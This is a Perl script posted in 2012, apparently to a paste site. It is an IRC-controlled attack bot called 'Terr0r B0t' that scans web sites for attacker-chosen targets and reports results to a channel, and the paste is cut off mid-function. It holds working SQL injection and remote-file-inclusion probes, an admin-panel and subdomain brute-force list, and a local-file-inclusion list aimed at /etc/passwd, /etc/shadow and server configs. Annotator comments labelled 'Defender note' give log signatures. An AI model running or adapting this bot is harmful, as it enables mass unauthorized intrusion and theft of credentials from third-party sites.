
Untitled

a guest
Jan 19th, 2012
  1. #!usr/bin/perl
  2. #Terr0r B0t 0.3 (C) Doddy Hackman 2012
  3. #Commands to use
  4. #
  5. #!base64 <encode/decode> <string>
  6. #!hex <encode/decode> <string>
  7. #!ascii <encode/decode> <string>
  8. #!panel <page>
  9. #!sqli <page>
  10. #!lfi <page>
  11. #!iplocator <ip>
  12. #!sqlifinder <page>
  13. #!rfifinder <page>
  14. #!help
  15.  
  16. use IO::Socket;
  17. use LWP::UserAgent;
  18. use HTTP::Request::Common;
  19. use HTML::LinkExtor;
  20.  
  # Host-label wordlist consumed by scan1(): each label is tried as
  # "http://<label>.<domain>" against the domain text received over IRC.
  # Defender note: one client requesting many of these labels for a single
  # domain in quick succession is a simple enumeration signature.
  my @dns = (
      'www', 'www1', 'www2', 'www3',
      'ftp', 'ns', 'mail', '3com',
      'aix', 'apache', 'back', 'bind',
      'boreder', 'bsd', 'business', 'chains',
      'cisco', 'content', 'corporate', 'cpv',
      'dns', 'domino', 'dominoserver', 'download',
      'e-mail', 'e-safe', 'email', 'esafe',
      'external', 'extranet', 'firebox', 'firewall',
      'front', 'fw', 'fw0', 'fwe',
      'fw-1', 'firew', 'gate', 'gatekeeper',
      'gateway', 'gauntlet', 'group', 'help',
      'hop', 'hp', 'hpjet', 'hpux',
      'http', 'https', 'hub', 'ibm',
      'ids', 'info', 'inside', 'internal',
      'internet', 'intranet', 'ipfw', 'irix',
      'jet', 'list', 'lotus', 'lotusdomino',
      'lotusnotes', 'lotusserver', 'mailfeed', 'mailgate',
      'mailgateway', 'mailgroup', 'mailhost', 'maillist',
      'mailpop', 'mailrelay', 'mimesweeper', 'ms',
      'msproxy', 'mx', 'nameserver', 'news',
      'newsdesk', 'newsfeed', 'newsgroup', 'newsroom',
      'newsserver', 'nntp', 'notes', 'noteserver',
      'notesserver', 'nt', 'outside', 'pix',
      'pop', 'pop3', 'pophost', 'popmail',
      'popserver', 'print', 'printer', 'private',
      'proxy', 'proxyserver', 'public', 'qpop',
      'raptor', 'read', 'redcreek', 'redhat',
      'route', 'router', 'scanner', 'screen',
      'screening', 's#ecure', 'seek', 'smail',
      'smap', 'smtp', 'smtpgateway', 'smtpgw',
      'solaris', 'sonic', 'spool', 'squid',
      'sun', 'sunos', 'suse', 'switch',
      'transfer', 'trend', 'trendmicro', 'vlan',
      'vpn', 'wall', 'web', 'webmail',
      'webserver', 'webswitch', 'win2000', 'win2k',
      'upload', 'file', 'fileserver', 'storage',
      'backup', 'share', 'core', 'gw',
      'wingate', 'main', 'noc', 'home',
      'radius', 'security', 'access', 'dmz',
      'domain', 'sql', 'mysql', 'mssql',
      'postgres', 'db', 'database', 'imail',
      'imap', 'exchange', 'sendmail', 'louts',
      'test', 'logs', 'stage', 'staging',
      'dev', 'devel', 'ppp', 'chat',
      'irc', 'eng', 'admin', 'unix',
      'linux', 'windows', 'apple', 'hp-ux',
      'bigip', 'pc'
  );
  70.  
  # Relative-path wordlist consumed by scan(): each entry is requested as
  # "<target>/<path>" and reported when the response is a success.
  # Defender note: a run of requests for these paths from one client, most of
  # them answered with 404, stands out in web-server access logs.
  my @panels = (
      'admin/admin.asp', 'admin/login.asp',
      'admin/index.asp', 'admin/admin.aspx',
      'admin/login.aspx', 'admin/index.aspx',
      'admin/webmaster.asp', 'admin/webmaster.aspx',
      'asp/admin/index.asp', 'asp/admin/index.aspx',
      'asp/admin/admin.asp', 'asp/admin/admin.aspx',
      'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
      'admin/', 'login.asp',
      'login.aspx', 'admin.asp',
      'admin.aspx', 'webmaster.aspx',
      'webmaster.asp', 'login/index.asp',
      'login/index.aspx', 'login/login.asp',
      'login/login.aspx', 'login/admin.asp',
      'login/admin.aspx', 'administracion/index.asp',
      'administracion/index.aspx', 'administracion/login.asp',
      'administracion/login.aspx', 'administracion/webmaster.asp',
      'administracion/webmaster.aspx', 'administracion/admin.asp',
      'administracion/admin.aspx', 'php/admin/',
      'admin/admin.php', 'admin/index.php',
      'admin/login.php', 'admin/system.php',
      'admin/ingresar.php', 'admin/administrador.php',
      'admin/default.php', 'administracion/',
      'administracion/index.php', 'administracion/login.php',
      'administracion/ingresar.php', 'administracion/admin.php',
      'administration/', 'administration/index.php',
      'administration/login.php', 'administrator/index.php',
      'administrator/login.php', 'administrator/system.php',
      'system/', 'system/login.php',
      'admin.php', 'login.php',
      'administrador.php', 'administration.php',
      'administrator.php', 'admin1.html',
      'admin1.php', 'admin2.php',
      'admin2.html', 'yonetim.php',
      'yonetim.html', 'yonetici.php',
      'yonetici.html', 'adm/',
      'admin/account.php', 'admin/account.html',
      'admin/index.html', 'admin/login.html',
      'admin/home.php', 'admin/controlpanel.html',
      'admin/controlpanel.php', 'admin.html',
      'admin/cp.php', 'admin/cp.html',
      'cp.php', 'cp.html',
      'administrator/', 'administrator/index.html',
      'administrator/login.html', 'administrator/account.html',
      'administrator/account.php', 'administrator.html',
      'login.html', 'modelsearch/login.php',
      'moderator.php', 'moderator.html',
      'moderator/login.php', 'moderator/login.html',
      'moderator/admin.php', 'moderator/admin.html',
      'moderator/', 'account.php',
      'account.html', 'controlpanel/',
      'controlpanel.php', 'controlpanel.html',
      'admincontrol.php', 'admincontrol.html',
      'adminpanel.php', 'adminpanel.html',
      'admin1.asp', 'admin2.asp',
      'yonetim.asp', 'yonetici.asp',
      'admin/account.asp', 'admin/home.asp',
      'admin/controlpanel.asp', 'admin/cp.asp',
      'cp.asp', 'administrator/index.asp',
      'administrator/login.asp', 'administrator/account.asp',
      'administrator.asp', 'modelsearch/login.asp',
      'moderator.asp', 'moderator/login.asp',
      'moderator/admin.asp', 'account.asp',
      'controlpanel.asp', 'admincontrol.asp',
      'adminpanel.asp', 'fileadmin/',
      'fileadmin.php', 'fileadmin.asp',
      'fileadmin.html', 'administration.html',
      'sysadmin.php', 'sysadmin.html',
      'phpmyadmin/', 'myadmin/',
      'sysadmin.asp', 'sysadmin/',
      'ur-admin.asp', 'ur-admin.php',
      'ur-admin.html', 'ur-admin/',
      'Server.php', 'Server.html',
      'Server.asp', 'Server/',
      'wp-admin/', 'administr8.php',
      'administr8.html', 'administr8/',
      'administr8.asp', 'webadmin/',
      'webadmin.php', 'webadmin.asp',
      'webadmin.html', 'administratie/',
      'admins/', 'admins.php',
      'admins.asp', 'admins.html',
      'administrivia/', 'Database_Administration/',
      'WebAdmin/', 'useradmin/',
      'sysadmins/', 'admin1/',
      'system-administration/', 'administrators/',
      'pgadmin/', 'directadmin/',
      'staradmin/', 'ServerAdministrator/',
      'SysAdmin/', 'administer/',
      'LiveUser_Admin/', 'sys-admin/',
      'typo3/', 'panel/',
      'cpanel/', 'cPanel/',
      'cpanel_file/', 'platz_login/',
      'rcLogin/', 'blogindex/',
      'formslogin/', 'autologin/',
      'support_login/', 'meta_login/',
      'manuallogin/', 'simpleLogin/',
      'loginflat/', 'utility_login/',
      'showlogin/', 'memlogin/',
      'members/', 'login-redirect/',
      'sub-login/', 'wp-login/',
      'login1/', 'dir-login/',
      'login_db/', 'xlogin/',
      'smblogin/', 'customer_login/',
      'UserLogin/', 'login-us/',
      'acct_login/', 'admin_area/',
      'bigadmin/', 'project-admins/',
      'phppgadmin/', 'pureadmin/',
      'sql-admin/', 'radmind/',
      'openvpnadmin/', 'wizmysqladmin/',
      'vadmind/', 'ezsqliteadmin/',
      'hpwebjetadmin/', 'newsadmin/',
      'adminpro/', 'Lotus_Domino_Admin/',
      'bbadmin/', 'vmailadmin/',
      'Indy_admin/', 'ccp14admin/',
      'irc-macadmin/', 'banneradmin/',
      'sshadmin/', 'phpldapadmin/',
      'macadmin/', 'administratoraccounts/',
      'admin4_account/', 'admin4_colon/',
      'radmind-1/', 'Super-Admin/',
      'AdminTools/', 'cmsadmin/',
      'SysAdmin2/', 'globes_admin/',
      'cadmins/', 'phpSQLiteAdmin/',
      'navSiteAdmin/', 'server_admin_small/',
      'logo_sysadmin/', 'server/',
      'database_administration/', 'power_user/',
      'system_administration/', 'ss_vms_admin_sm/'
  );
  198.  
  # File-path wordlist consumed by lfi(): each entry is appended verbatim to
  # the target URL text and the resulting URL is fetched.
  # Defender note: any of these absolute paths or "../" sequences appearing
  # inside a request parameter is a file-inclusion probe worth alerting on.
  my @buscar3 = (
      '../../../boot.ini',
      '../../../../boot.ini',
      '../../../../../boot.ini',
      '../../../../../../boot.ini',
      '/etc/passwd',
      '/etc/shadow',
      '/etc/shadow~',
      '/etc/hosts',
      '/etc/motd',
      '/etc/apache/apache.conf',
      '/etc/fstab',
      '/etc/apache2/apache2.conf',
      '/etc/apache/httpd.conf',
      '/etc/httpd/conf/httpd.conf',
      '/etc/apache2/httpd.conf',
      '/etc/apache2/sites-available/default',
      '/etc/mysql/my.cnf',
      '/etc/my.cnf',
      '/etc/sysconfig/network-scripts/ifcfg-eth0',
      '/etc/redhat-release',
      '/etc/httpd/conf.d/php.conf',
      '/etc/pam.d/proftpd',
      '/etc/phpmyadmin/config.inc.php',
      '/var/www/config.php',
      '/etc/httpd/logs/error_log',
      '/etc/httpd/logs/error.log',
      '/etc/httpd/logs/access_log',
      '/etc/httpd/logs/access.log',
      '/var/log/apache/error_log',
      '/var/log/apache/error.log',
      '/var/log/apache/access_log',
      '/var/log/apache/access.log',
      '/var/log/apache2/error_log',
      '/var/log/apache2/error.log',
      '/var/log/apache2/access_log',
      '/var/log/apache2/access.log',
      '/var/www/logs/error_log',
      '/var/www/logs/error.log',
      '/var/www/logs/access_log',
      '/var/www/logs/access.log',
      '/usr/local/apache/logs/error_log',
      '/usr/local/apache/logs/error.log',
      '/usr/local/apache/logs/access_log',
      '/usr/local/apache/logs/access.log',
      '/var/log/error_log',
      '/var/log/error.log',
      '/var/log/access_log',
      '/var/log/access.log',
      '/etc/group',
      '/etc/security/group',
      '/etc/security/passwd',
      '/etc/security/user',
      '/etc/security/environ',
      '/etc/security/limits',
      '/usr/lib/security/mkuser.default',
      '/apache/logs/access.log',
      '/apache/logs/error.log',
      '/etc/httpd/logs/acces_log',
      '/etc/httpd/logs/acces.log',
      '/var/log/httpd/access_log',
      '/var/log/httpd/error_log',
      '/apache2/logs/error.log',
      '/apache2/logs/access.log',
      '/logs/error.log',
      '/logs/access.log',
      '/usr/local/apache2/logs/access_log',
      '/usr/local/apache2/logs/access.log',
      '/usr/local/apache2/logs/error_log',
      '/usr/local/apache2/logs/error.log',
      '/var/log/httpd/access.log',
      '/var/log/httpd/error.log',
      '/opt/lampp/logs/access_log',
      '/opt/lampp/logs/error_log',
      '/opt/xampp/logs/access_log',
      '/opt/xampp/logs/error_log',
      '/opt/lampp/logs/access.log',
      '/opt/lampp/logs/error.log',
      '/opt/xampp/logs/access.log',
      '/opt/xampp/logs/error.log',
      'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
      'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
      '/usr/local/apache/conf/httpd.conf',
      '/usr/local/apache2/conf/httpd.conf',
      '/etc/apache/conf/httpd.conf',
      '/usr/local/etc/apache/conf/httpd.conf',
      '/usr/local/apache/httpd.conf',
      '/usr/local/apache2/httpd.conf',
      '/usr/local/httpd/conf/httpd.conf',
      '/usr/local/etc/apache2/conf/httpd.conf',
      '/usr/local/etc/httpd/conf/httpd.conf',
      '/usr/apache2/conf/httpd.conf',
      '/usr/apache/conf/httpd.conf',
      '/usr/local/apps/apache2/conf/httpd.conf',
      '/usr/local/apps/apache/conf/httpd.conf',
      '/etc/apache2/conf/httpd.conf',
      '/etc/http/conf/httpd.conf',
      '/etc/httpd/httpd.conf',
      '/etc/http/httpd.conf',
      '/etc/httpd.conf',
      '/opt/apache/conf/httpd.conf',
      '/opt/apache2/conf/httpd.conf',
      '/var/www/conf/httpd.conf',
      '/private/etc/httpd/httpd.conf',
      '/private/etc/httpd/httpd.conf.default',
      '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
      '/Volumes/webBackup/private/etc/httpd/httpd.conf',
      '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
      'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
      'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
      'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
      '/usr/local/php/httpd.conf.php',
      '/usr/local/php4/httpd.conf.php',
      '/usr/local/php5/httpd.conf.php',
      '/usr/local/php/httpd.conf',
      '/usr/local/php4/httpd.conf',
      '/usr/local/php5/httpd.conf',
      '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
      '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
      '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
      '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
      '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
      '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
      '/usr/local/etc/apache/vhosts.conf',
      '/etc/php.ini',
      '/bin/php.ini',
      '/etc/httpd/php.ini',
      '/usr/lib/php.ini',
      '/usr/lib/php/php.ini',
      '/usr/local/etc/php.ini',
      '/usr/local/lib/php.ini',
      '/usr/local/php/lib/php.ini',
      '/usr/local/php4/lib/php.ini',
      '/usr/local/php5/lib/php.ini',
      '/usr/local/apache/conf/php.ini',
      '/etc/php4.4/fcgi/php.ini',
      '/etc/php4/apache/php.ini',
      '/etc/php4/apache2/php.ini',
      '/etc/php5/apache/php.ini',
      '/etc/php5/apache2/php.ini',
      '/etc/php/php.ini',
      '/etc/php/php4/php.ini',
      '/etc/php/apache/php.ini',
      '/etc/php/apache2/php.ini',
      '/web/conf/php.ini',
      '/usr/local/Zend/etc/php.ini',
      '/opt/xampp/etc/php.ini',
      '/var/local/www/conf/php.ini',
      '/etc/php/cgi/php.ini',
      '/etc/php4/cgi/php.ini',
      '/etc/php5/cgi/php.ini',
      'c:\php5\php.ini',
      'c:\php4\php.ini',
      'c:\php\php.ini',
      'c:\PHP\php.ini',
      'c:\WINDOWS\php.ini',
      'c:\WINNT\php.ini',
      'c:\apache\php\php.ini',
      'c:\xampp\apache\bin\php.ini',
      'c:\NetServer\bin\stable\apache\php.ini',
      'c:\home2\bin\stable\apache\php.ini',
      'c:\home\bin\stable\apache\php.ini',
      '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
      '/usr/local/cpanel/logs',
      '/usr/local/cpanel/logs/stats_log',
      '/usr/local/cpanel/logs/access_log',
      '/usr/local/cpanel/logs/error_log',
      '/usr/local/cpanel/logs/license_log',
      '/usr/local/cpanel/logs/login_log',
      '/var/cpanel/cpanel.config',
      '/var/log/mysql/mysql-bin.log',
      '/var/log/mysql.log',
      '/var/log/mysqlderror.log',
      '/var/log/mysql/mysql.log',
      '/var/log/mysql/mysql-slow.log',
      '/var/mysql.log',
      '/var/lib/mysql/my.cnf',
      'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
      'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
      'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
      'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
      'C:\ProgramFiles\MySQL\data\hostname.err',
      'C:\ProgramFiles\MySQL\data\mysql.log',
      'C:\ProgramFiles\MySQL\data\mysql.err',
      'C:\ProgramFiles\MySQL\data\mysql-bin.log',
      'C:\MySQL\data\hostname.err',
      'C:\MySQL\data\mysql.log',
      'C:\MySQL\data\mysql.err',
      'C:\MySQL\data\mysql-bin.log',
      'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
      'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
      'C:\ProgramFiles\MySQL\my.ini',
      'C:\ProgramFiles\MySQL\my.cnf',
      'C:\MySQL\my.ini',
      'C:\MySQL\my.cnf',
      '/etc/logrotate.d/proftpd',
      '/www/logs/proftpd.system.log',
      '/var/log/proftpd',
      '/etc/proftp.conf',
      '/etc/protpd/proftpd.conf',
      '/etc/vhcs2/proftpd/proftpd.conf',
      '/etc/proftpd/modules.conf',
      '/var/log/vsftpd.log',
      '/etc/vsftpd.chroot_list',
      '/etc/logrotate.d/vsftpd.log',
      '/etc/vsftpd/vsftpd.conf',
      '/etc/vsftpd.conf',
      '/etc/chrootUsers',
      '/var/log/xferlog',
      '/var/adm/log/xferlog',
      '/etc/wu-ftpd/ftpaccess',
      '/etc/wu-ftpd/ftphosts',
      '/etc/wu-ftpd/ftpusers',
      '/usr/sbin/pure-config.pl',
      '/usr/etc/pure-ftpd.conf',
      '/etc/pure-ftpd/pure-ftpd.conf',
      '/usr/local/etc/pure-ftpd.conf',
      '/usr/local/etc/pureftpd.pdb',
      '/usr/local/pureftpd/etc/pureftpd.pdb',
      '/usr/local/pureftpd/sbin/pure-config.pl',
      '/usr/local/pureftpd/etc/pure-ftpd.con',
      '/etc/pure-ftpd/pure-ftpd.pdb',
      '/etc/pureftpd.pdb',
      '/etc/pureftpd.passwd',
      '/etc/pure-ftpd/pureftpd.pdb',
      '/var/log/pure-ftpd/pure-ftpd.log',
      '/logs/pure-ftpd.log',
      '/var/log/pureftpd.log',
      '/var/log/ftp-proxy/ftp-proxy.log',
      '/var/log/ftp-proxy',
      '/var/log/ftplog',
      '/etc/logrotate.d/ftp',
      '/etc/ftpchroot',
      '/etc/ftphosts',
      '/var/log/exim_mainlog',
      '/var/log/exim/mainlog',
      '/var/log/maillog',
      '/var/log/exim_paniclog',
      '/var/log/exim/paniclog',
      '/var/log/exim/rejectlog',
      '/var/log/exim_rejectlog'
  );
  441.  
  # HTTP client shared by toma() and tomax(): 13-second timeout and a fixed
  # browser-style User-Agent.  The same literal is sent with every request the
  # bot makes (note the missing space before "Firefox"), so it is usable as a
  # log-search indicator.
  my $nave = LWP::UserAgent->new();
  $nave->timeout(13);
  $nave->agent(
  "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  );

  print "\n[+] Terr0r B0t 0.3 (c) Doddy Hackman 2012\n\n";

  # Hard-coded IRC control-channel settings; as pasted, the server is the
  # loopback address.
  my $servidor = "127.0.0.1"; #Server
  my $canal = "#locos"; #Channel
  my $nick = "Hussein"; # Nick
  my $port = "6667"; # Port

  print "[+] Starting the bot\n";

  # Plain TCP connection to the IRC server (no TLS is requested here).
  my $soquete = new IO::Socket::INET(
      PeerAddr => $servidor,
      PeerPort => $port,
      Proto => 'tcp'
  );

  if ( !$soquete ) {
      print "\n[-] Error\n";
      exit 1;
  }

  # IRC registration followed by joining the control channel; every result
  # the bot produces is later sent to this channel as PRIVMSG text.
  print $soquete "NICK $nick\r\n";
  print $soquete "USER $nick 1 1 1 1\r\n";
  print $soquete "JOIN $canal\r\n";

  print "[+] Online\n\n";
  473.  
  # Main command loop: read one line at a time from the IRC socket and act on
  # any line that contains a ":!<command>" substring.  The sender of the line
  # is never inspected, so the handlers run for whoever can get such a line
  # delivered to this client.  The captured argument text is passed unvalidated
  # to the HTTP helpers and echoed back into PRIVMSG lines.
  while ( my $log = <$soquete> ) {
      chomp($log);

      # Keep-alive: answer the server's PING with the same payload.
      if ( $log =~ /^PING(.*)$/i ) {
          print $soquete "PONG $1\r\n";
      }

      # Command list sent to the channel.  It advertises "!locatorip" while
      # the handler further down matches "!iplocator".
      if ( $log =~ m/:!help/g ) {
          print $soquete "PRIVMSG $canal : [++] Commands\r\n";
          print $soquete "PRIVMSG $canal : [+] !help\r\n";
          print $soquete "PRIVMSG $canal : [+] !locatorip <ip>\r\n";
          print $soquete "PRIVMSG $canal : [+] !sqlifinder <dork>\r\n";
          print $soquete "PRIVMSG $canal : [+] !rfifinder <dork>\r\n";
          print $soquete "PRIVMSG $canal : [+] !panel <page>\r\n";
          print $soquete "PRIVMSG $canal : [+] !sqli <page>\r\n";
          print $soquete "PRIVMSG $canal : [+] !fuzzdns <page>\r\n";
          print $soquete "PRIVMSG $canal : [+] !lfi <page>\r\n";
          print $soquete
            "PRIVMSG $canal : [+] !base64 <encode/decode> <text>\r\n";
          print $soquete "PRIVMSG $canal : [+] !ascii <encode/decode> <text>\r\n";
          print $soquete "PRIVMSG $canal : [+] !hex <encode/decode> <text> \r\n";
      }

      # Path enumeration against the given base URL (see scan()).
      if ( $log =~ m/:!panel (.*)$/g ) {
          scan($1);
          print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
      }

      # IP lookup: the argument is interpolated into a third-party lookup URL
      # and the returned HTML is scraped with regexes for three table cells.
      if ( $log =~ m/:!iplocator (.*)$/g ) {
          my $ip = $1;
          print $soquete "PRIVMSG $canal : [+] Getting info\r\n";
          $total =
            "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$ip";
          $re = toma($total);

          if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
              print $soquete "PRIVMSG $canal : [+] City : $2\r\n";
          }
          else {
              print $soquete "PRIVMSG $canal : [-] Not Found\r\n";
          }
          if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
              print $soquete "PRIVMSG $canal : [+] Country : $2\r\n";
          }
          if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
              print $soquete "PRIVMSG $canal : [+] State or Region : $2\r\n";
          }
      }

      # Search-driven SQL probe: google() returns candidate URLs, and each is
      # requested once with "-1+union+select+666--" appended.  A page is
      # reported when the response contains MySQL's column-count error text,
      # so the check only works against sites that show database errors to
      # visitors.  Defender note: "union+select+666" in a query string is a
      # fixed request signature of this handler.
      if ( $log =~ m/:!sqlifinder (.*)$/g ) {
          my $dork = $1;
          my @paginas = &google( $dork, "30" ); # 30 EDIT
          print $soquete "PRIVMSG $canal : [+] SQL Scan Started\r\n";
          print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
          print $soquete "PRIVMSG $canal : [Webs Count] : "
            . int(@paginas) . "\r\n";
          print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";

          for my $page (@paginas) {
              my ( $pass1, $pass2 ) = ( "+", "--" );
              $code1 =
                toma( $page . "-1"
                  . $pass1 . "union"
                  . $pass1
                  . "select"
                  . $pass1 . "666"
                  . $pass2 );
              if ( $code1 =~
                  /The used SELECT statements have a different number of columns/ig
                )
              {
                  print $soquete "PRIVMSG $canal : [+] SQLI : $page\r\n";
              }
          }
          print $soquete "PRIVMSG $canal : [+] Finished\r\n";
      }

      # Search-driven remote-inclusion probe: a fixed external URL is appended
      # to each candidate and the response is checked for text taken from that
      # external page.  Defender note: the appended URL literal is constant
      # and therefore searchable in access logs.
      if ( $log =~ m/:!rfifinder (.*)$/g ) {
          my $dork = $1;
          my @paginas = &google( $dork, "30" ); # 30 EDIT
          print $soquete "PRIVMSG $canal : [+] RFI Scan Started\r\n";
          print $soquete "PRIVMSG $canal : [+] Searching pages\r\n";
          print $soquete "PRIVMSG $canal : [Webs Count] : "
            . int(@paginas) . "\r\n";
          print $soquete "PRIVMSG $canal : [Status] : Scanning\r\n";

          for my $page (@paginas) {
              $code1 = toma( $page . "http:/www.supertangas.com/" );
              if ( $code1 =~ /Los mejores TANGAS de la red/ig )
              { # This is real knowledge xDDD
                  print $soquete "PRIVMSG $canal : [+] RFI : $page\r\n";
              }
          }
          print $soquete "PRIVMSG $canal : [+] Finished\r\n";
      }

      # Single-target SQL probe (see scan2()).
      if ( $log =~ m/:!sqli (.*)$/g ) {
          print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
          scan2($1);
      }

      # Host-label enumeration for the given domain (see scan1()).
      if ( $log =~ m/:!fuzzdns (.*)$/g ) {
          scan1($1);
          print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
      }

      # File-inclusion probe against the given URL (see lfi()).
      if ( $log =~ m/:!lfi (.*)$/g ) {
          lfi($1);
          print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
      }

      # Text utilities: Base64, decimal code points and hex.  The greedy
      # first group means the last space on the line separates the option
      # from the text.
      if ( $log =~ m/:!base64 (.*) (.*)$/g ) {
          use MIME::Base64;
          my ( $opcion, $aa ) = ( $1, $2 );
          if ( $opcion eq "encode" ) {
              print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
              print $soquete "PRIVMSG $canal : [+] Encode : "
                . encode_base64($aa) . "\r\n";
          }
          elsif ( $opcion eq "decode" ) {
              print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
              print $soquete "PRIVMSG $canal : [+] Text : "
                . decode_base64($aa) . "\r\n";
          }
          else {
              print $soquete "PRIVMSG $canal : ??\r\n";
          }
      }

      if ( $log =~ m/:!ascii (.*) (.*)$/ ) {
          my ( $opcion, $aa ) = ( $1, $2 );
          chomp $aa;
          if ( $opcion eq "encode" ) {
              print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
              print $soquete "PRIVMSG $canal : [+] Encode : "
                . ascii($aa) . "\r\n";
          }
          elsif ( $opcion eq "decode" ) {
              print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
              print $soquete "PRIVMSG $canal : [+] Text : "
                . ascii_de($aa) . "\r\n";
          }
          else {
              print $soquete "PRIVMSG $canal : ???\r\n";
          }
      }

      if ( $log =~ m/:!hex (.*) (.*)$/ ) {
          my ( $opcion, $aa ) = ( $1, $2 );
          chomp $aa;
          if ( $opcion eq "encode" ) {
              print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
              print $soquete "PRIVMSG $canal : [+] Encode : "
                . encode($aa) . "\r\n";
          }
          elsif ( $opcion eq "decode" ) {
              print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
              print $soquete "PRIVMSG $canal : [+] Text : "
                . decode($aa) . "\r\n";
          }
          else {
              print $soquete "PRIVMSG $canal : ????\r\n";
          }
      }
  }
  639.  
  # File-inclusion probe for the URL text in $_[0]; results go to the IRC
  # channel, nothing is returned.
  #
  # The whole check keys on one PHP warning ("No such file or directory in
  # <b>...</b> on line") appearing in the page body: its presence on the first
  # request is taken as the signal, and for each @buscar3 entry its absence is
  # reported as "File Found".  A site that does not display PHP warnings to
  # visitors gives this routine nothing to work with.
  # $code, $code1 and $ok are undeclared package globals.
  sub lfi {
      print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]" . "\r\n";
      print $soquete "PRIVMSG $canal : [+] Status : [scanning]" . "\r\n";
      $code = toma( $_[0] );
      if ( $code =~ /No such file or directory in <b>(.*)<\/b> on line/ig ) {
          print $soquete "PRIVMSG $canal : [+] Vulnerable !" . "\r\n";
          # $1 is the server-side script path leaked inside the warning.
          print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"
            . "\r\n";
          print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]" . "\r\n";
          for my $file (@buscar3) {
              $code1 = toma( $_[0] . $file );
              unless ( $code1 =~
                  /No such file or directory in <b>(.*)<\/b> on line/ig )
              {
                  $ok = 1;
                  print $soquete "PRIVMSG $canal : [File Found] : "
                    . $_[0]
                    . $file . "\r\n";
              }
          }
          unless ( $ok == 1 ) {
              print $soquete "PRIVMSG $canal : [-] Dont found any file" . "\r\n";
          }
      }
      else {
          print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"
            . "\r\n";
      }
  }
  669.  
  # Host-label enumeration: for every @dns entry, request
  # "http://<label>.<domain>" (domain text in $_[0]) and post the URL to the
  # channel when the HTTP response object reports success.  Only plain HTTP is
  # tried.  $code is an undeclared package global.
  sub scan1 {
      print $soquete "PRIVMSG $canal : [*] Searching DNS to " . $_[0] . "\r\n";
      for my $path (@dns) {
          $code = tomax( "http://" . $path . "." . $_[0] );
          if ( $code->is_success ) {
              print $soquete "PRIVMSG $canal : http://"
                . $path . "."
                . $_[0] . "\r\n";
          }
      }
  }
  681.  
  # Path enumeration: for every @panels entry, request "<base>/<path>" (base
  # URL text in $_[0]) and post the URL to the channel when the response object
  # reports success.  Each hit also writes a bell character to the operator's
  # local STDOUT.  $code and $ct are undeclared package globals.
  sub scan {
      print $soquete "PRIVMSG $canal [*] Searching panels to " . $_[0] . "\r\n";
      for my $path (@panels) {
          $code = tomax( $_[0] . "/" . $path );
          if ( $code->is_success ) {
              print "\a";
              $ct = 1;
              print $soquete "PRIVMSG $canal [Link] : "
                . $_[0] . "/"
                . $path . "\r\n";
          }
      }
      if ( $ct ne 1 ) {
          print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
      }
  }
  698.  
  # Single-target SQL probe for the URL text in $_[0]; results go to the IRC
  # channel.  The named sub details() is declared inside this sub's braces.
  #
  # Stages, as written:
  #   1. append "-1 order by9999999999" (keywords joined by the separator from
  #      bypass()) and look for MySQL/PHP error text in the response;
  #   2. append "-1 union select 666" and look for the column-count error;
  #   3. for 2..52 columns, send a UNION SELECT of char(...) markers that spell
  #      RATSXPDOWN<n>RATSXPDOWN and look for the marker echoed in the page.
  #
  # Defender notes: every stage depends on database error text or injected
  # values being reflected in the response.  The requests carry fixed
  # substrings usable as WAF or log-search signatures: "union"/"select" joined
  # by "+", "/**/" or "%20", the literal 666, and char() lists beginning
  # 82,65,84,83,88,80,68,79,87,78 (the code points of RATSXPDOWN).
  sub scan2 {

      my $rows = "0";
      my $asc;
      my $page = $_[0];

      # The separator style comes from the script's own second command-line
      # argument, not from the IRC message.
      ( $pass1, $pass2 ) = &bypass( $ARGV[1] );
      $inyection =
        $page . "-1" . $pass1 . "order" . $pass1 . "by" . "9999999999" . $pass2;
      $code = toma($inyection);
      if ( $code =~
          /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
          || $code =~ /mysql_free_result/ig
          || $code =~ /mysql_fetch_assoc/ig
          || $code =~ /mysql_num_rows/ig
